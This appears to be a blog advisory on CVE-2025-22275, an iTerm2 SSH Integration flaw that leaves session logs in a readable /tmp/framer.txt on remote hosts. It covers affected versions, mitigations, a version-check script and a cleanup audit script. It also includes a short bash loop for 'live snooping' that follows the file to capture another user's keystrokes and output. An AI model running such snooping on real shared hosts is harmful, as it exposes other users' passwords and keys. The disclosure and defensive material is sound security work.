Summary:
A new vulnerability in iTerm2, the popular terminal emulator for macOS, has been assigned CVE-2025-22275. Versions 3.5.6 through 3.5.10 (fixed in 3.5.11) let an attacker with an account on a remote host read sensitive information from /tmp/framer.txt, a file that iTerm2's SSH Integration leaves behind on that host. If you use SSH Integration (often via it2ssh) to log into remote hosts that have Python installed, which most do, you may be at risk. Let's break down how this works, who's affected, and how an attacker could exploit it in practice.

What’s iTerm2 and What’s the Vulnerability?

iTerm2 is the terminal of choice for many Mac users. It's packed with features, one being SSH Integration. With SSH Integration, iTerm2 makes remote sessions better by adding features like inline images, smarter text rendering, and more. To do this, it runs a small Python helper (the "framer") on the remote host for the duration of the session. In affected versions, that helper writes to the /tmp/framer.txt file.

The Problem:
In iTerm2 3.5.6 through 3.5.10, the helper logs the session's input and output to /tmp/framer.txt on the remote host. That file lives in the shared /tmp directory, is created with the user's ordinary default permissions (typically 0644 under a umask of 022, so readable by every local user), and is not removed when the session ends.

In layman's terms:
Anyone with a shell on that server can read /tmp/framer.txt and see what you typed and what the server sent back in your iTerm2 session, including any credentials.

Who's Affected?

You are affected if all of the following are true:

- You run iTerm2 version 3.5.6, 3.5.7, 3.5.8, 3.5.9, or 3.5.10
- You use iTerm2's SSH Integration (e.g., with it2ssh or direct features)
- The remote host has Python installed (it usually does; the helper is a Python script, so without Python it never runs)
- Other (possibly untrusted) users can log into that remote host and read /tmp/framer.txt

Good news:
Fixed in v3.5.11.
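To tell quickly whether a given Mac is in the affected range, here is an added example script (not iTerm2 project code and not from the original post). It compares dotted version strings numerically, reports whether a version falls in 3.5.6 <= v < 3.5.11, and reads the installed version from the app bundle; the bundle path /Applications/iTerm.app is the default install location and is an assumption.

```sh
#!/bin/sh
# Added example, not part of iTerm2 or of the original post: check whether a
# locally installed iTerm2 falls in the affected range 3.5.6 <= v < 3.5.11.
# The app bundle path below is the default location and is an assumption.

# Numeric, component-wise comparison of two dotted version strings.
# Prints -1, 0 or 1 so callers can branch on the result. A suffix such as
# "3.5.11beta1" is read as 3.5.11 (awk keeps the leading digits only).
vercmp() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) { print "-1"; exit }
            if (xi > yi) { print "1"; exit }
        }
        print "0"
    }'
}

# Succeeds (exit 0) when the given iTerm2 version is affected by CVE-2025-22275.
iterm2_affected() {
    [ "$(vercmp "$1" 3.5.6)" -ge 0 ] && [ "$(vercmp "$1" 3.5.11)" -lt 0 ]
}

# Read the installed version from the bundle's Info.plist (macOS only).
installed_iterm2_version() {
    defaults read /Applications/iTerm.app/Contents/Info.plist \
        CFBundleShortVersionString 2>/dev/null
}

if v=$(installed_iterm2_version) && [ -n "$v" ]; then
    if iterm2_affected "$v"; then
        echo "iTerm2 $v is AFFECTED: update to 3.5.11 or later"
    else
        echo "iTerm2 $v is not in the affected range"
    fi
else
    echo "iTerm2 not found at /Applications/iTerm.app (or not on macOS)"
fi
```

On a fleet of managed Macs the same check can be pushed out through whatever runs shell scripts for you; the pure-function part (vercmp and iterm2_affected) has no macOS dependency, so it can also be fed version strings collected elsewhere.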

Exploit Details: How the Leak Happens

When iTerm2 connects via SSH with SSH Integration enabled, it starts a Python helper on the remote host to talk to the remote shell. In affected versions, that helper logs the session to a fixed path, /tmp/framer.txt.

The exploit takes advantage of three things:

- The path is fixed and predictable, and /tmp is shared by every user on the system.
- The file is created with ordinary default permissions, so any local user can read it (it is the file's own mode that matters, not the fact that /tmp itself is world-readable).
- The file is not cleaned up, so it can be read during the session or long after it has ended. A user who follows the file sees the commands the iTerm2 session runs and, because output is logged as well, what those commands printed.

1. Victim logs in to the server using iTerm2 (with SSH Integration enabled).

2. Victim runs sensitive commands, maybe cat ~/mysecrets.txt, or types a password at a prompt.

3. Attacker logs in as a normal user (no sudo needed).

4. Attacker reads /tmp/framer.txt:

tail -f /tmp/framer.txt

If the timing is right, the attacker sees the victim's keystrokes and command output show up in real time; otherwise they can simply cat the file after the session, since it is never removed.

The /tmp/framer.txt content might look like this (an illustrative example only; the real file's layout is not reproduced here, but it records what was typed and what the session sent back):

2024-06-12 15:22:08 run: cat /home/user/.ssh/id_rsa
2024-06-12 15:22:11 run: nano /home/user/secrets.txt
2024-06-12 15:22:15 exit

An attacker simply runs

cat /tmp/framer.txt    # Or tail -f for real-time monitoring

Boom! Now the attacker knows what files you looked at or edited—including secret keys, passwords, or confidential project info.

Let’s automate reading /tmp/framer.txt for live snooping

#!/bin/bash
# Poll until the log appears, then follow it. tail -n +1 prints whatever is
# already in the file before following, so nothing written earlier is missed.
echo "[*] Watching for leaked iTerm2 commands via /tmp/framer.txt..."
while true; do
  if [ -f /tmp/framer.txt ]; then
    tail -n +1 -f /tmp/framer.txt
    break
  fi
  sleep 1
done

Run this as an unprivileged user while the victim starts their session.

Real-World Impact

- Leakage of usernames, filenames, commands, paths, and sometimes even content from sensitive files (if echoed or pasted).
- Leakage of credentials typed into the session, such as passwords entered at interactive prompts, since keystrokes are logged along with output.
- Exposure persists after logout, because the file is never removed.

What to Do

- Update iTerm2 to 3.5.11 or later! Get the latest version from the iTerm2 website.
- Delete /tmp/framer.txt on every remote host you connected to with an affected version. The file outlives the session, so this matters even after you have upgraded.
- Avoid using SSH Integration on shared hosts until you have upgraded.
- As a sysadmin, note that mounting /tmp with noexec,nosuid,nodev does nothing here: the problem is a readable file, not an executable one. A stricter default umask (077) would make newly created files private, but because the path is fixed, an attacker who pre-creates a world-readable /tmp/framer.txt before the victim connects may still capture the data, depending on how the helper opens the file. The app fix is the real remedy.
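For the cleanup step on the remote side, here is an added example audit script (not iTerm2 project code and not from the original post). It classifies who can read a leftover /tmp/framer.txt from its mode bits, reports its owner and size, and removes it; the path is a parameter so the same functions can be pointed at any file. The default path /tmp/framer.txt is the one named in the advisory; the function names are my own.

```sh
#!/bin/sh
# Added example, not part of iTerm2 or of the original post: audit a host for a
# leftover /tmp/framer.txt, classify who can read it, and remove it. The path
# is a parameter so the same functions can be pointed at any file.

# Classify a file's exposure from its mode bits. Prints one of:
# missing, world-readable, group-readable, private. Uses ls -l because the
# stat(1) syntax differs between GNU and BSD systems.
framer_exposure() {
    f="${1:-/tmp/framer.txt}"
    [ -e "$f" ] || { echo missing; return 0; }
    mode=$(ls -ld "$f" | cut -c1-10)    # e.g. -rw-r--r--
    case "$mode" in
        ???????r*) echo world-readable ;;   # "other" read bit (column 8) set
        ????r*)    echo group-readable ;;   # group read bit (column 5) set
        *)         echo private ;;
    esac
}

# Report owner and size alongside the exposure; a file owned by another user
# is worth a second look, since it may have been planted ahead of a session.
framer_report() {
    f="${1:-/tmp/framer.txt}"
    state=$(framer_exposure "$f")
    if [ "$state" = missing ]; then
        echo "$f: missing"
    else
        echo "$f: $state, $(ls -ld "$f" | awk '{print "owner=" $3 ", bytes=" $5}')"
    fi
}

# Remove the leftover log. Returns 1 when it cannot be removed (for example
# because it belongs to another user and /tmp is sticky), so a caller can alert.
framer_cleanup() {
    f="${1:-/tmp/framer.txt}"
    [ -e "$f" ] || { echo "nothing to remove"; return 0; }
    if rm -f "$f" 2>/dev/null && [ ! -e "$f" ]; then
        echo "removed $f"
        return 0
    fi
    echo "could not remove $f" >&2
    return 1
}

framer_report
```

Run it as the account that used SSH Integration (or as root), since only the file's owner or root can delete it from a sticky /tmp. To sweep several hosts, feed the script to a remote shell over plain ssh, for example ssh host sh -s < audit.sh, and add a framer_cleanup call at the end once you are happy with the report.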

References & Further Info

- CVE-2025-22275 NVD page (pending details)
- iTerm2 Release Notes
- iTerm2 SSH Integration
- Discussion in iTerm2 Issue Tracker (search for "framer.txt" or "information disclosure")

Final Thoughts

CVE-2025-22275 is a good example of how convenience features (like SSH Integration) can open real security holes when not handled with care. If you use iTerm2 against shared hosts, update now and check /tmp on every remote host you connected to for leftovers. Don't let your terminal become someone else's data siphon!

*If you’d like to see more deep dives into terminal and SSH security, bookmark this blog!*

Timeline

Published on: 01/03/2025 05:15:08 UTC
Last modified on: 01/03/2025 07:15:25 UTC